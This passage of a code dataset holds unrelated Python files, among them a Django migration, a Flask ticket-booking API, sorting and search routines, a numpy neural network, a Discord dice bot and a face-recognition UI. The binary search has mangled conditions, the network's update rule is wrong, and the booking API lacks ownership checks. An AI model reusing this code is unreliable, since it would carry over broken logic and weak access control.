models.ForeignKey(to='battleship_viewer.Game')),\n ('player', models.ForeignKey(to='battleship_viewer.Player')),\n ],\n ),\n migrations.CreateModel(\n name='ShipLocation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('x', models.IntegerField()),\n ('y', models.IntegerField()),\n ('ship', models.ForeignKey(to='battleship_viewer.Ship')),\n ],\n ),\n migrations.CreateModel(\n name='Shot',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('x', models.IntegerField()),\n ('y', models.IntegerField()),\n ('move', models.ForeignKey(to='battleship_viewer.Move')),\n ('player', models.ForeignKey(to='battleship_viewer.Player')),\n ],\n ),\n migrations.AddField(\n model_name='game',\n name='player1',\n field=models.ForeignKey(related_name='player1', to='battleship_viewer.Player'),\n ),\n migrations.AddField(\n model_name='game',\n name='player2',\n field=models.ForeignKey(related_name='player2', to='battleship_viewer.Player'),\n ),\n migrations.AddField(\n model_name='game',\n name='winner',\n field=models.ForeignKey(related_name='winner', to='battleship_viewer.Player', null=True),\n ),\n ]\n","repo_name":"okcpython/battleship_django","sub_path":"battleship_viewer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71677133661","text":"def shell_sort(arr):\n n = len(arr)\n gap = n // 2\n\n while gap > 0:\n for i in range(gap, n):\n temp = arr[i]\n k = i\n\n while k >= gap and arr[k - gap] > temp:\n arr[k] = arr[k - gap]\n k -= gap\n\n arr[k] = temp\n\n gap //= 2\n\n return arr\n\n\nprint(shell_sort([4, 6, 8, 3, 2, 1, 6]))\n","repo_name":"christianstefaniw/PythonAlgorithms","sub_path":"sorting/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"21934791649","text":"from flask_restful import Resource, Api\nfrom flask_restful import fields, marshal_with\nfrom flask_restful import reqparse\nfrom flask import make_response , jsonify\nfrom application.database import db\nfrom application.models import Theatre , Show , Booking , User\nfrom flask import current_app as app\nfrom datetime import datetime\n\nfrom flask_jwt_extended import jwt_required, get_jwt_identity ######\nfrom traceback import print_exc\nfrom flask_restful import abort\nfrom application.helpers import admin_required\n\nimport application.data_access as da\nfrom time import perf_counter_ns\n\nfrom werkzeug.exceptions import HTTPException\n\nbooking_fields = {\n 'id': fields.Integer,\n 'show_id': fields.Integer,\n 'user_id': fields.Integer,\n 'booking_time': fields.String, # We'll format the datetime for output\n 'seats': fields.Integer,\n 'user_rating': fields.Integer\n}\n\n# Define the request parser for POST method\nbooking_parser = reqparse.RequestParser()\n#booking_parser.add_argument('show_id', type=int, required=True)\n#booking_parser.add_argument('user_id', type=int, required=True)\nbooking_parser.add_argument('seats', type=int, required=True)\n#booking_parser.add_argument('user_rating', type=int)\n\nupdate_booking_parser = reqparse.RequestParser()\nupdate_booking_parser.add_argument('user_rating', type=int , help='rating must be between 1 - 5')\n\n\n#get method for shows of particular user\n\nclass UserBookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def get(self):\n user_id = get_jwt_identity() ###### \n user = User.query.get(user_id)\n if not user:\n abort(404 , description=\"User not found\")\n else:\n start = perf_counter_ns()\n user_bookings = da.get_bookings_by_user_id(user_id)\n stop = perf_counter_ns()\n print(\"time taken :\" , stop - start)\n return user_bookings , 200\n \n \n \nclass AllBookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def get(self):\n bookings = Booking.query.all() ###### \n return bookings , 200\n \n \n# GET method for new booking\n\nclass BookingAPI(Resource):\n @jwt_required() ######\n @marshal_with(booking_fields)\n def post(self,show_id):\n #try:\n user_id = get_jwt_identity() ######\n args = booking_parser.parse_args()\n \n if not (User.query.get(user_id)):\n abort(404 , description=\"User not found\")\n \n show = Show.query.get(show_id)\n #show = da.get_show_by_show_id(show_id)\n if not show:\n abort(404, description=\"Show not found\")\n \n if show.show_capacity == 0 :\n abort(403 , description=\"Housefull!\")\n elif show.show_capacity < args['seats']:\n abort(403 , description=\"Enough seats not available!\")\n else:\n show.show_capacity = show.show_capacity - args['seats']\n \n booking = Booking(show_id=show_id,user_id=user_id, booking_time=datetime.now() , seats = args['seats'] , user_rating = 0)\n db.session.add(booking)\n db.session.commit()\n da.cache.delete_memoized(da.get_bookings_by_user_id , user_id)\n da.cache.delete_memoized(da.get_shows_by_theatreid , show.theatre_id)\n return booking\n \n \n\nclass UpdateBookingAPI(Resource):\n @marshal_with(booking_fields)\n @jwt_required()\n def put(self, id):\n user_id = get_jwt_identity()\n booking = Booking.query.get(id)\n if not booking:\n abort(404 , description=\"Booking not found\")\n\n args = update_booking_parser.parse_args()\n \n # Update user_rating if provided\n if 'user_rating' in args:\n booking.user_rating = args['user_rating']\n\n # Update the average rating for the show\n bookings = 
Booking.query.filter_by(show_id=booking.show_id).all()\n show = Show.query.get(booking.show_id)\n\n if not bookings:\n #show = Show.query.get(booking.show_id)\n show.rating =0.0\n else:\n total_rating = sum(booking.user_rating for booking in bookings)\n average_rating = total_rating / len(bookings)\n\n #show = Show.query.get(booking.show_id)\n show.rating = average_rating\n\n db.session.commit()\n da.cache.delete_memoized(da.get_bookings_by_user_id , user_id)\n da.cache.delete_memoized(da.get_shows_by_theatreid , show.theatre_id)\n \n\n return booking \n\n\n","repo_name":"jasleen9/XenonStack","sub_path":"ticketshow/application/controllers/api/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34262633938","text":"def binarySearch(arr, val):\n\tlo = 0\n\thi = len(arr)-1\n\tctr = 0\n\tmid = int((lo + hi)/2)\n\tcurrent = arr[mid]\n\tarr.sort() #sort values into numerical order in case they aren't already\n\n\n\t\t\n\twhile val != arr[mid]:\n\t\tif val > arr[mid]:\n\t\t\tctr = ctr + 1\n\t\t\tprint (arr[mid])\n\t\t\tmid = int((mid + hi)/2)\n\t\t\tif valarr[mid-1]: #do this if value is in between to table values.\n\t\t\t\tprint (\"Value not in table\")\n\t\t\tif val>arr[-2]: #so we can test if value is last number in array\n\t\t\t\tif val == arr[-1]:\n\t\t\t\t\tmid=-1\n\t\t\t\telse:\n\t\t\t\t\tprint (\"Value not in table\")\n\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\tif val < arr[mid]:\n\t\t\tctr = ctr +1\n\t\t\tprint (arr[mid])\n\t\t\tmid = int((mid +lo)/2)\n\t\t\tif valarr[mid-1]: #do this if value is in between to table values but not in table.\n\t\t\t\tprint (\"Value not in table\")\n\t\t\tif val layer specification for the FF network in list form (eg. [5 3 3 2])\r\n\t\t:param learning_rate: learning rate of the network (C)\r\n\t\t:param momentum: momentum parameter (alpha)\r\n\t\t\"\"\"\r\n\t\tself.c = learning_rate\r\n\t\tself.alpha = momentum\r\n\t\tself.num_inputs = layers[0]\r\n\t\tself.num_outputs = layers[-1]\r\n\t\tself.num_layers = len(layers)\r\n\r\n\t\tself.weights = []\r\n\t\tself.biases = []\r\n\r\n\t\tfor i in range(1, self.num_layers):\r\n\t\t\tprev_outputs = layers[i-1]\r\n\t\t\tinit_parameter = 1.0 / prev_outputs\r\n\r\n\t\t\t# initialize n x m weight matrix using uniform initialization, each row is a node's input weights\r\n\t\t\tweight_mtx = np.random.uniform(-init_parameter, init_parameter, size=(layers[i], prev_outputs)) \r\n\r\n\t\t\t# n x 1 bias vector, each row is a node's bias\r\n\t\t\tbias_vector = np.zeros((layers[i], 1))\t\r\n\r\n\t\t\tself.weights.append(weight_mtx)\r\n\t\t\tself.biases.append(bias_vector)\r\n\r\n\r\n\tdef one_hot(self, d):\r\n\t\t\"\"\"transforms a numeric label into one-hot column vector\"\"\"\r\n\t\ty = np.zeros((self.num_outputs, 1))\r\n\t\ty[d] = 1\r\n\t\treturn y\r\n\r\n\r\n\tdef train(self, train_X, train_D, val_X=None, val_D=None, num_epochs=1):\r\n\t\t\"\"\"\r\n\t\ttrain the classifier, return list of validation accuracy per epoch\r\n\r\n\t\t:param train_X: feature matrix of training set\r\n\t\t:param trian_D: list of labels for supervised learning\r\n\t\t:param val_X: feature matrix of validation set\r\n\t\t:param val_D: label array for validation\r\n\t\t:param num_epochs: iterations over the training set\r\n\t\t\"\"\"\r\n\t\t# First convert training labels to one hot vectors\r\n\t\ttrain_Y = list(map(self.one_hot, train_D))\r\n\t\taccuracies = []\r\n\r\n\t\tfor epoch in range(num_epochs):\r\n\r\n\t\t\tfor x, y in zip(train_X, train_Y):\r\n\t\t\t\tself.update_SGD(x.reshape(1, self.num_inputs), y)\r\n\r\n\t\t\tif val_X is not None and val_D is not None:\r\n\t\t\t\tpredictions = self.test(val_X)\r\n\t\t\t\taccuracies.append(accuracy_score(val_D, predictions))\r\n\r\n\t\treturn accuracies\r\n\r\n\r\n\tdef test(self, test_X):\r\n\t\t\"\"\"return predicted labels for feature set\"\"\"\r\n\t\treturn list(map(self.predict, test_X))\r\n\r\n\r\n\tdef update_SGD(self, x, y):\r\n\t\t\"\"\"\r\n\t\tApplies a single step of stochastic gradient descent\r\n\r\n\t\t:param x: 1 x m feature vector from dataset\r\n\t\t:param y: one-hot target vector indicating desired label\r\n\t\t\"\"\"\r\n\t\tdel_w, del_b = self.backpropogate(x, y)\r\n\t\tself.weights = [w - self.c * dw + self.alpha * w for w, dw in zip(self.weights, 
del_w)]\r\n\t\tself.biases = [b - self.c * db + self.alpha * b for b, db in zip(self.biases, del_b)]\r\n\r\n\t\treturn None\r\n\r\n\r\n\tdef predict(self, x):\r\n\t\t\"\"\"\r\n\t\tgenerate a predicted label given feature vector x\r\n\t\t\"\"\"\r\n\t\tactivation = x.reshape(1, self.num_inputs).T\r\n\t\tfor w, b in zip(self.weights, self.biases):\r\n\t\t\tz = np.dot(w, activation) + b \r\n\t\t\tactivation = sigmoid(z)\r\n\r\n\t\treturn np.argmax(activation)\r\n\r\n\r\n\tdef backpropogate(self, x, y):\r\n\t\t\"\"\"\r\n\t\tApply the backpropogation algorithm to generate the deltas for weights\r\n\t\tand biases in each layer\r\n\r\n\t\t:param x: 1 x m feature vector from dataset\r\n\t\t:param y: one-hot target vector indicating desired label\r\n\t\t\"\"\"\r\n\t\t# These will hold the gradient of the cost function with respect to\r\n\t\t# weights and biases\r\n\t\tdel_w = [np.zeros(w.shape) for w in self.weights]\r\n\t\tdel_b = [np.zeros(b.shape) for b in self.biases]\r\n\r\n\t\t# Forward pass through the network\r\n\t\tactivation = x.T\r\n\t\tactivations = [activation]\r\n\t\tnet_inputs = []\r\n\r\n\t\tfor w, b in zip(self.weights, self.biases):\r\n\t\t\tz = np.dot(w, activation) + b\r\n\t\t\tnet_inputs.append(z)\r\n\t\t\tactivation = sigmoid(z)\r\n\t\t\tactivations.append(activation)\r\n\r\n\t\t# Error at output layer\r\n\t\toutput = self.one_hot(np.argmax(activations[-1]))\r\n\t\tdelta = self.cost_derivative(output, y) * sigmoid_prime(net_inputs[-1]) #dC/dz at output\r\n\t\tdel_b[-1] = delta #dC/db = dC/dz\r\n\t\tdel_w[-1] = np.dot(delta, activations[-2].T)\r\n\r\n\t\t# propogate error backwards layer by layer\r\n\t\tfor l in range(2, self.num_layers):\r\n\t\t\tz = net_inputs[-l]\r\n\t\t\tdelta = np.dot(self.weights[-l+1].T, delta) * sigmoid_prime(z)\r\n\t\t\tdel_b[-l] = delta\r\n\t\t\tdel_w[-l] = np.dot(delta, activations[-l-1].T)\r\n\r\n\t\treturn (del_w, del_b)\r\n\r\n\r\n\t@staticmethod\r\n\tdef cost_function(output_activations, y):\r\n\t\t\"\"\"use 1/2 of the square error as the cost function\"\"\"\r\n\t\treturn (1/2) * (y - output_activations) ** 2\r\n\r\n\t@staticmethod\r\n\tdef cost_derivative(output_activations, y):\r\n\t\t\"\"\"derivative of the L2 cost function with respect to network output\"\"\"\r\n\t\treturn (output_activations - y)\r\n\r\n\r\ndef sigmoid(z):\r\n\t\"\"\"\r\n\tThe sigmoid function\r\n\t\"\"\"\r\n\tz = np.clip(z, -500, 500)\r\n\treturn 1.0 / (1.0 + np.exp(-z))\r\n\r\ndef sigmoid_prime(z):\r\n\t\"\"\"\r\n\tderivative of the sigmoid function\r\n\t\"\"\"\r\n\treturn sigmoid(z) * (1 - sigmoid(z))\r\n","repo_name":"ben-the-hedgehog/backprop-network","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70467895260","text":"# -*- coding: utf-8 -*-\n\n\ndef createArnoldTextureSettings():\n \"\"\"The patched version of the original file\"\"\"\n import pymel.core as pm\n import maya.cmds as cmds\n import pymel.versions as versions\n from mtoa.ui.globals import settings\n\n pm.setUITemplate(\"attributeEditorTemplate\", pushTemplate=True)\n pm.columnLayout(adjustableColumn=True)\n\n pm.attrControlGrp(\n \"autotx\",\n cc=settings.updateAutoTxSettings,\n label=\"Auto-convert Textures to TX (Disabled in Anima)\",\n attribute=\"defaultArnoldRenderOptions.autotx\",\n enable=False,\n )\n\n pm.attrControlGrp(\n \"use_existing_tiled_textures\",\n label=\"Use Existing TX Textures\",\n attribute=\"defaultArnoldRenderOptions.use_existing_tiled_textures\",\n )\n\n # disable autotx\n pm.setAttr(\"defaultArnoldRenderOptions.autotx\", 0)\n settings.updateAutoTxSettings()\n cmds.separator()\n\n # don't create texture_automip for 2017 as autoTx is ON by default\n maya_version = versions.shortName()\n if int(float(maya_version)) < 2017:\n pm.attrControlGrp(\n \"texture_automip\",\n label=\"Auto-mipmap\",\n attribute=\"defaultArnoldRenderOptions.textureAutomip\",\n )\n\n pm.attrControlGrp(\n \"texture_accept_unmipped\",\n label=\"Accept Unmipped\",\n attribute=\"defaultArnoldRenderOptions.textureAcceptUnmipped\",\n )\n\n cmds.separator()\n\n pm.checkBoxGrp(\n \"ts_autotile\", cc=settings.updateAutotileSettings, label=\"\", label1=\"Auto-tile\"\n )\n\n pm.connectControl(\"ts_autotile\", \"defaultArnoldRenderOptions.autotile\", index=2)\n\n pm.intSliderGrp(\n \"ts_texture_autotile\",\n label=\"Tile Size\",\n minValue=16,\n maxValue=64,\n fieldMinValue=16,\n fieldMaxValue=1024,\n )\n\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=1\n )\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=2\n )\n pm.connectControl(\n \"ts_texture_autotile\", \"defaultArnoldRenderOptions.textureAutotile\", index=3\n )\n\n \"\"\"pm.attrControlGrp('texture_autotile',\n label=\"Auto-tile Size\",\n attribute='defaultArnoldRenderOptions.textureAutotile')\"\"\"\n\n pm.attrControlGrp(\n \"texture_accept_untiled\",\n label=\"Accept Untiled\",\n attribute=\"defaultArnoldRenderOptions.textureAcceptUntiled\",\n )\n\n pm.attrControlGrp(\n \"texture_max_memory_MB\",\n label=\"Max Cache Size (MB)\",\n attribute=\"defaultArnoldRenderOptions.textureMaxMemoryMB\",\n )\n\n pm.attrControlGrp(\n \"texture_max_open_files\",\n label=\"Max Open Files\",\n attribute=\"defaultArnoldRenderOptions.textureMaxOpenFiles\",\n )\n\n cmds.separator()\n\n cmds.attrControlGrp(\n \"texture_diffuse_blur\",\n label=\"Diffuse Blur\",\n attribute=\"defaultArnoldRenderOptions.textureDiffuseBlur\",\n )\n\n # cmds.attrControlGrp('texture_glossy_blur',\n # label=\"Glossy Blur\",\n # attribute='defaultArnoldRenderOptions.textureGlossyBlur')\n\n pm.setParent(\"..\")\n\n pm.setUITemplate(popTemplate=True)\n","repo_name":"eoyilmaz/anima","sub_path":"anima/dcc/mayaEnv/config/arnold_patches.py","file_name":"arnold_patches.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"69"}
+{"seq_id":"21412111324","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom data_module import data\nimport json\n\n\n\"\"\"\najax测试服务器\n\"\"\"\n\n\napp = Flask(__name__)\nCORS(app=app)\nport = 8001 # 配置端口\n\n\n@app.route(\"/\", methods=['post', 'get'])\ndef index():\n return \"hello world!\"\n\n\n@app.route(\"/\", methods=['post', 'get'])\ndef common_func(key):\n values = data.get(key)\n mes = {\"message\": \"success\"}\n if values is None:\n mes['message'] = \"not found!\"\n else:\n mes['data'] = values\n print(mes)\n return json.dumps(mes)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=port, debug=True, threaded=True)\n","repo_name":"SYYDSN/py_projects","sub_path":"tools_box/ajax_server.py","file_name":"ajax_server.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23611347604","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Dice:\n max_die = 20\n\n help_str = '''\\\nx refers to the number of dice to roll\n\nx is an optional argument and when omitted will default to one\n\ny refers to the type of dice to roll\n\nOmitting the xdy argument defaults to rolling one d20\n\nMax number of rollable dice is {max_die}\n\nThe available types of die are d3, d4, d5, d6, d8, d10, and d20\n'''.format(max_die=max_die)\n\n available_die = [3, 4, 5, 6, 8, 10, 20, 100]\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='roll', help=help_str, brief='Roll some dice', aliases=['dice', 'r'])\n async def roll(self, xdy : str = '1d20'):\n try:\n num_dice, limit = xdy.split('d')\n if not num_dice:\n num_dice = 1\n else:\n num_dice = int(num_dice)\n limit = int(limit)\n except Exception as e:\n await self.bot.say('Invalid usage. Expected !roll xdy')\n else:\n if num_dice > Dice.max_die:\n await self.bot.say('The max number of die you can roll is {max_die}'.format(max_die=Dice.max_die))\n elif limit not in Dice.available_die:\n await self.bot.say('Invalid dice type')\n else:\n rolls = [random.randint(1, limit) for r in range(num_dice)]\n await self.bot.say('`[' + ']['.join(map(str, rolls)) + '] = ' + str(sum(rolls)) + '`')\n\n @roll.error\n async def roll_error(self, error, ctx):\n if isinstance(error, commands.BadArgument) or isinstance(error, commands.MissingRequiredArgument):\n await self.bot.say(error)\n\ndef setup(bot):\n bot.add_cog(Dice(bot))\n","repo_name":"Tharinis18/Dumbass-Bot","sub_path":"cogs/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"2674660769","text":"import json\nimport logging\nimport random\nimport os\n\nfrom nni.retiarii import Model, submit_models, wait_models\nfrom nni.retiarii.strategy import BaseStrategy\nfrom nni.retiarii import Sampler\n\n\n_logger = logging.getLogger(__name__)\n\nclass RandomSampler(Sampler):\n def choice(self, candidates, mutator, model, index):\n return random.choice(candidates)\n\nclass SimpleStrategy(BaseStrategy):\n def __init__(self):\n self.name = ''\n\n def run(self, base_model, applied_mutators, trainer):\n try:\n _logger.info('stargety start...')\n while True:\n model = base_model\n _logger.info('apply mutators...')\n _logger.info('mutators: {}'.format(applied_mutators))\n random_sampler = RandomSampler()\n for mutator in applied_mutators:\n _logger.info('mutate model...')\n mutator.bind_sampler(random_sampler)\n model = mutator.apply(model)\n # get and apply training approach\n _logger.info('apply training approach...')\n model.apply_trainer(trainer['modulename'], trainer['args'])\n # run models\n submit_models(model)\n wait_models(model)\n _logger.info('Strategy says:', model.metric)\n except Exception as e:\n _logger.error(logging.exception('message'))\n","repo_name":"luckygirlfyh/ConSK-GCN","sub_path":"Model/ConSK-GCN_MELD/nni-master/nni-master/test/retiarii_test/simple_strategy.py","file_name":"simple_strategy.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"1876997642","text":"import AuthenticationServices\nfrom PyObjCTools.TestSupport import TestCase, min_os_level\n\n\nclass TestASAuthorizationProviderExtensionAuthorizationRequest(TestCase):\n @min_os_level(\"11.0\")\n def test_constants11_0(self):\n self.assertIsInstance(\n AuthenticationServices.ASAuthorizationProviderAuthorizationOperationConfigurationRemoved,\n str,\n )\n\n @min_os_level(\"13.0\")\n def test_constants13_0(self):\n self.assertIsInstance(\n AuthenticationServices.ASAuthorizationProviderAuthorizationOperationDirectRequest,\n str,\n )\n\n @min_os_level(\"11.0\")\n def test_methods11_0(self):\n self.assertResultIsBOOL(\n AuthenticationServices.ASAuthorizationProviderExtensionAuthorizationRequest.isCallerManaged\n )\n\n @min_os_level(\"12.3\")\n def test_methods12_3(self):\n self.assertResultIsBOOL(\n AuthenticationServices.ASAuthorizationProviderExtensionAuthorizationRequest.isUserInterfaceEnabled\n )\n","repo_name":"ronaldoussoren/pyobjc","sub_path":"pyobjc-framework-authenticationservices/pyobjctest/test_asauthorizationproviderextensionauthorizationrequest.py","file_name":"test_asauthorizationproviderextensionauthorizationrequest.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":439,"dataset":"github-code","pt":"69"}
+{"seq_id":"1423132890","text":"import matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.rcParams['font.family'] = 'montserrat'\nfig, ax = plt.subplots()\ndata = []\n#d = float(input('ведите частоту отображений маркеров: '))\n# Запись данных из файлов\nwith open('data.txt', 'r') as f:\n data = list(map(int, f.readlines()))\nwith open('settings.txt', 'r') as f:\n ch_disc = float(f.readline())\n shag_kvant = float(f.readline())\n zar_time = round(float(f.readline()), 2)\n raz_time = round(float(f.readline()), 2)\nall_time = zar_time + raz_time\n\n'''if d != 1:\n ost = int(len(data) * d)\n ybr = len(data) - ost\n sh = int(len(data) / ybr)\n print(sh)\n print(ost)\n print(ybr)\n i = sh\n while i < len(data):\n data.pop(i)\n print(data)\n i += sh\n'''\n\nif data != []:\n # Построение графика\n x = [i * all_time / len(data) for i in range(len(data))]\n y = [i / 256 * 3.3 for i in data]\n plt.plot(x, y, c='blue', label='V(t)', linewidth=2 )\n plt.scatter(x, y, s=25, c='blue', marker='o')\n plt.xlabel('Время, с', fontsize=20)\n plt.ylabel('Напряжение, В', fontsize=20)\n ax.minorticks_on()\n ax.grid(True, which='both')\n ax.grid(which='major', color='k', linewidth=1)\n ax.grid(which='minor', color='k', linestyle=':')\n plt.title('Процесс заряда и разряда конденсатора в RC-цепочке ', fontsize=33, wrap=True, pad=20)\n plt.legend(loc = 'upper right', ncol=20, prop={'size': 30})\n plt.axis([round(min(x), 1), round(max(x), 1), round(min(y), 1), round(max(y), 1)])\n ax.text(40, 2, 'Время заряда = {} с \\n\\nВремя разряда = {} с'.format(zar_time, raz_time), fontsize=20)\n plt.show()\n\n\n","repo_name":"MordvinovaA/get","sub_path":"graf-7.1.py","file_name":"graf-7.1.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7059562521","text":"import tkinter as tk\nimport cv2\nfrom PIL import Image, ImageTk\nimport numpy as np\nfrom Recognition.FaceRecognition import FaceRecognition\nfrom Model.Account import Account\nfrom View.FaceListFrame import FaceListFrame\nfrom View.MyVideoCapture import MyVideoCapture\nfrom Model.AttendanceLog import AttendanceLog\nimport config\nimport threading\n\n\nclass UI:\n def __init__(self, window, windowTitle, videoSource=0):\n self.window = window\n self.window.title(windowTitle)\n self.videoSource = videoSource\n self.data = UI.getData()\n\n self.frameToShow = None\n self.frameToPredict = None\n self.photo = None\n self.net = cv2.dnn.readNetFromCaffe(\"Recognition/face_detector/deploy.prototxt\",\n \"Recognition/face_detector/res10_300x300_ssd_iter_140000.caffemodel\")\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n self.vid = MyVideoCapture(videoSource)\n self.canvas = tk.Canvas(window, width=self.vid.width, height=self.vid.height)\n self.canvas.pack()\n self.faceFrame = FaceListFrame(self.window)\n self.canvasFaces = self.faceFrame.canvasFaces\n self.nameLabels = self.faceFrame.nameLabels\n\n self.faces = []\n self.labels = []\n self.delay = 20\n self.predictThread = threading.Thread(target=self.predict)\n # self.showThread = threading.Thread(target=self.updateFrame)\n self.predictThread.start()\n self.updateFrame()\n self.window.mainloop()\n\n @staticmethod\n def getData():\n Account.update(\"\")\n dicts = Account.getFaces()\n return dicts\n\n def updateFrame(self): \n if self.frameToShow is not None:\n self.photo = ImageTk.PhotoImage(image=Image.fromarray(self.frameToShow))\n self.canvas.create_image(0, 0, image=self.photo, anchor=tk.NW)\n\n for i in range(len(self.faces)):\n self.canvasFaces[i].create_image(90, 90, image=self.faces[i])\n self.nameLabels[i].config(text=str(self.labels[i]))\n\n self.window.after(self.delay, self.updateFrame)\n\n def predict(self):\n while True:\n ret, frame = self.vid.getFrame()\n self.frameToPredict = frame\n bboxes = self.detectFace(self.frameToPredict)\n print(len(bboxes))\n listLabels = FaceRecognition.predictLabels(bboxes, self.data, self.frameToPredict)\n self.frameToShow= self.frameToPredict\n for i in range(len(bboxes)):\n box = bboxes[i]\n (startX, startY, endX, endY) = box\n self.frameToShow = cv2.rectangle(self.frameToShow, (startX, startY), (endX, endY), (0, 255, 0), 2)\n face = self.frameToPredict[startY:endY, startX:endX]\n studentId = ''\n if listLabels[i] == config.STRANGER_LABEL:\n name = config.STRANGER_LABEL\n else:\n name, studentId = FaceRecognition.getIdName(listLabels[i])\n\n print(i, name)\n if face.shape[0] > 100 and name != config.STRANGER_LABEL and name not in self.labels:\n self.faces.append(ImageTk.PhotoImage(image=Image.fromarray(cv2.resize(face, (150, 200)))))\n self.labels.append(name)\n UI.saveAttendanceRecord(face, studentId, name)\n\n if len(self.faces) > config.NUM_FACES:\n self.faces.pop(0)\n self.labels.pop(0)\n \n\n @staticmethod\n def saveAttendanceRecord(face, studentId, name):\n path = FaceRecognition.saveFace(face, studentId, config.IMAGE_FOLDER)\n AttendanceLog.save(studentId, path)\n FaceRecognition.voice(name, config.SOUND_FOLDER)\n AttendanceLog.send()\n\n def detectFace(self, frame):\n (h, w) = frame.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,\n (300, 300), (104.0, 177.0, 123.0))\n # Phat hien khuon mat\n self.net.setInput(blob)\n detections = self.net.forward()\n listBbox = []\n 
# listFaces = []\n # Loop over the detected faces\n for i in range(0, detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n\n # If the confidence is greater than the threshold\n if confidence > 0.75:\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n listBbox.append(box.astype(\"int\"))\n\n return listBbox\n\n","repo_name":"fancoltran/facerecognizer","sub_path":"View/UIMultithread.py","file_name":"UIMultithread.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5518383394","text":"#!/usr/bin/env python3\n#\n# script -c \"./t48a.py\" /dev/null | ./t48b.py\n#\n\nimport time\nimport random\n\ndef output():\n for i in range(15):\n print(random.randint(1, 101))\n time.sleep(3)\n\nif __name__ == \"__main__\":\n output()\n","repo_name":"ckatsak/junkcode","sub_path":"t048/t48a.py","file_name":"t48a.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22865679671","text":"__version__ = \"1.0.3\"\n\nfrom argparse import ArgumentParser\nfrom PIL import Image\n\nCOLORS = ( (0, 0, 0),\n (0, 0, 205), (0, 0, 255),\n (205, 0, 0), (255, 0, 0),\n (205, 0, 205), (255, 0, 255),\n (0, 205, 0), (0, 255, 0),\n (0, 205, 205), (0, 255, 255),\n (205, 205, 0), (255, 255, 0),\n (205, 205, 205), (255, 255, 255),\n )\n\nATTR_I = ( 0x00, 0x01, 0x01 | 0x40, 0x02, 0x02 | 0x40,\n 0x03, 0x03 | 0x40, 0x04, 0x04 | 0x40, 0x05, 0x05 | 0x40,\n 0x06, 0x06 | 0x40, 0x07, 0x07 | 0x40,)\n\nATTR_P = ( 0x00, 0x08, 0x08 | 0x40, 0x10, 0x10 | 0x40,\n 0x18, 0x18 | 0x40, 0x20, 0x20 | 0x40, 0x28, 0x28 | 0x40,\n 0x30, 0x30 | 0x40, 0x38, 0x38 | 0x40,)\n\nC2I = dict(zip(COLORS, ATTR_I))\nC2P = dict(zip(COLORS, ATTR_P))\n\nBASE = 128\n\ndef main():\n\n parser = ArgumentParser(description=\"PNG to Spectrum SCR converter\",\n epilog=\"Copyright (C) 2014-2016 Juan J Martinez \",\n )\n\n parser.add_argument(\"--version\", action=\"version\", version=\"%(prog)s \" + __version__)\n parser.add_argument(\"image\", help=\"image to convert\")\n\n args = parser.parse_args()\n\n try:\n image = Image.open(args.image)\n except IOError:\n parser.error(\"failed to open the image\")\n\n (w, h) = image.size\n\n if w != 256 or h != 192:\n parser.error(\"image size must be 256x192\")\n\n if not isinstance(image.getpixel((0, 0)), tuple):\n parse.error(\"only RGB(A) images are supported\")\n\n # so we support both RGB and RGBA images\n data = list(zip(list(image.getdata(0)), list(image.getdata(1)), list(image.getdata(2))))\n\n for c in data:\n if c not in COLORS:\n parser.error(\"invalid color %r in image\" % (c,))\n\n pixels = []\n attrib = []\n for y in range(0, h, 8):\n for x in range(0, w, 8):\n byte = []\n attr = []\n for j in range(8):\n row = 0\n for i in range(8):\n if not attr:\n attr.append(data[x + i + (j + y) * w])\n 